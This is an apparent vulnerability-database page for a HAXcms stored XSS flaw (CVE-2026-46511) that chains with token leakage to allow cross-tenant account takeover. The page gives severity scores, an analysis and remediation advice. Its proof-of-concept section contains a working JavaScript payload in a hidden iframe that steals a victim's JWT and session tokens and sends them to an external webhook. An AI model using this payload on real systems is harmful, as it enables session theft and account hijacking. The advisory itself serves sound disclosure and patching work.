Skip to main content

HAXcms EUVDEUVD-2026-34890

| CVE-2026-46511 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-05-19 https://github.com/haxtheweb/issues GHSA-x3x5-7h4h-gwxg
8.7
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

5
Analysis Updated
Jun 05, 2026 - 19:32 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 05, 2026 - 19:22 vuln.today
cvss_changed
CVSS changed
Jun 05, 2026 - 19:22 NVD
8.7 (HIGH)
Source Code Evidence Fetched
May 19, 2026 - 15:30 vuln.today
Analysis Generated
May 19, 2026 - 15:30 vuln.today

DescriptionGitHub Advisory

Summary

An attack chain utilizing Stored XSS alongside dynamic token exposure in the /system/api/connectionSettings endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session's authentication tokens (including the jwt, user_token, site_token, and appstore_token) into a global JavaScript variable (window.appSettings). An attacker can exploit the XSS vulnerability to force a victim's browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook.

Details

In Operations.php (connectionSettings()), the system returns a Javascript object designed to bootstrap the frontend context. This object, window.appSettings, acts as a "skeleton key" because it aggregates all necessary operational tokens for the active session.

While HAXcms correctly relies on the cryptographically signed JWT for backend authentication (preventing Direct Object Reference/IDOR attempts), the CMS fails to secure the tokens themselves. Specifically:

  1. The Vector: The system is vulnerable to Stored XSS (e.g., via injected iframe srcdoc or <video-player>).
  2. The Exposure: Because the connectionSettings endpoint serves the tokens locally based on the active PHPSESSID cookie, any malicious script running in the browser context can intercept these keys.
  3. The Chain: HAXcms isolates user environments by URL path (/<username>/). An attacker can use XSS to force the victim's browser to fetch their *target* username's specific settings via fetch('/<username>/system/api/connectionSettings'). Since the browser implicitly attaches the victim's session cookie, the server authenticates the request and returns the victim's valid JWT and tokens.

PoC

1. Setup the Webhook Target Prepare an external webhook (e.g., webhook.site) to receive the stolen data.

2. Inject the "Kill Chain" Payload As an authenticated attacker (e.g., having edit access to any site), inject the following Javascript via the verified Stored XSS vectors (such as checking the HTML Source of a page and writing an <iframe>):

html
<iframe srcdoc="<script>
    const targetUsername = 'bto108'; // Replace with target victim

    fetch(`/${targetUsername}/system/api/connectionSettings`)
      .then(res => res.text())
      .then(data => {
          const s = JSON.parse(data.substring(data.indexOf('{'), data.lastIndexOf('}') + 1));

          const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get('user_token');
          const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get('site_token');

          let aToken = 'N/A';
          if (s.appStore && s.appStore.params && s.appStore.params.appstore_token) {
              aToken = s.appStore.params.appstore_token;
          }

          // Exfiltrate via Image Request to bypass CORS
          const payload = btoa(JSON.stringify({
              target: targetUsername,
              jwt: s.jwt,
              user_token: uToken,
              site_token: sToken,
              appstore_token: aToken
          }));

          new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;
      });
</script>" style="display:none"></iframe>

3. Execution & Verification

  • When the victim (e.g., user bto108) views the compromised page, their browser automatically fires the fetch request, silently attaching their active session cookie.
  • The server responds with their connection settings.
  • The script parses their jwt, user_token, and other keys, encoding them in base64.
  • The attacker receives the full JWT and token dump on their webhook.

*Screenshots confirming the data leakage and webhook capture:* !Connection Settings Exposure !Secondary Settings Leak !Cross-tenant Exfiltration Console !Webhook Payload Capture !Stolen Data Result

Impact

Critical Severity. This attack completely compromises the primary defense mechanism of the CMS. By stealing the jwt and user_token, the attacker achieves total account hijacking without needing the victim's password. They can emulate the victim perfectly, bypassing standard interface restrictions to perform malicious administrative actions (creating/deleting sites, modifying user access, or uploading malicious content).

The reliance on a global Javascript variable (window.appSettings) to store long-lived administrative security tokens creates a devastating chokepoint when combined with XSS.

AnalysisAI

Cross-tenant account takeover in HAXcms (npm package @haxtheweb/haxcms-nodejs <= 25.0.0) allows an authenticated attacker with edit access to chain a stored XSS flaw with token leakage in the /system/api/connectionSettings endpoint to hijack other tenants' sessions. The endpoint exposes the victim's JWT, user_token, site_token, and appstore_token via the window.appSettings global, letting injected JavaScript silently exfiltrate them to an attacker-controlled webhook and fully impersonate the victim. A detailed reporter-supplied PoC exists in the GitHub Security Advisory, though there is no public exploit identified at time of analysis as a packaged weapon and no CISA KEV entry.

Technical ContextAI

HAXcms is a PHP/Node.js headless CMS (npm package @haxtheweb/haxcms-nodejs) that isolates tenants by URL path (/<username>/) and uses cryptographically signed JWTs plus per-feature tokens (user_token, site_token, appstore_token) for backend authentication. The flaw stems from CWE-79 (Improper Neutralization of Input During Web Page Generation) - Operations.php's connectionSettings() method bootstraps the frontend by writing all active-session tokens into a global window.appSettings JavaScript variable, while stored XSS sinks (e.g., iframe srcdoc and the <video-player> element) allow arbitrary script execution in the authenticated origin. Because authorization on /system/api/connectionSettings is bound to the PHPSESSID cookie rather than to the URL-path tenant, a malicious fetch under /<victim>/system/api/connectionSettings issued from the victim's browser is honored and returns the victim's tokens - collapsing the tenant isolation boundary into a single XSS-reachable chokepoint.

RemediationAI

Vendor-released patch: upgrade @haxtheweb/haxcms-nodejs to 26.0.0 or later as published in GHSA-x3x5-7h4h-gwxg (https://github.com/haxtheweb/issues/security/advisories/GHSA-x3x5-7h4h-gwxg), which is the only confirmed fix. Where immediate upgrade is not possible, compensating controls include tightening the trust model around edit accounts (require manual approval for new editor-tier users to shrink the pool of potential XSS injectors), restricting access to the /system/api/connectionSettings endpoint at a reverse proxy by enforcing that the URL-path tenant matches the authenticated session's username (this will break legitimate cross-site editing workflows for users who manage multiple tenants), and adding a strict Content-Security-Policy with script-src 'self' plus disallowed inline scripts and iframe srcdoc to neutralize the documented XSS sinks (note this may break HAXcms web components and admin UI features that rely on inline scripts and must be tested before deployment). Rotating all JWT signing keys and per-user tokens after patching is recommended in case prior exploitation occurred.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

EUVD-2026-34890 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy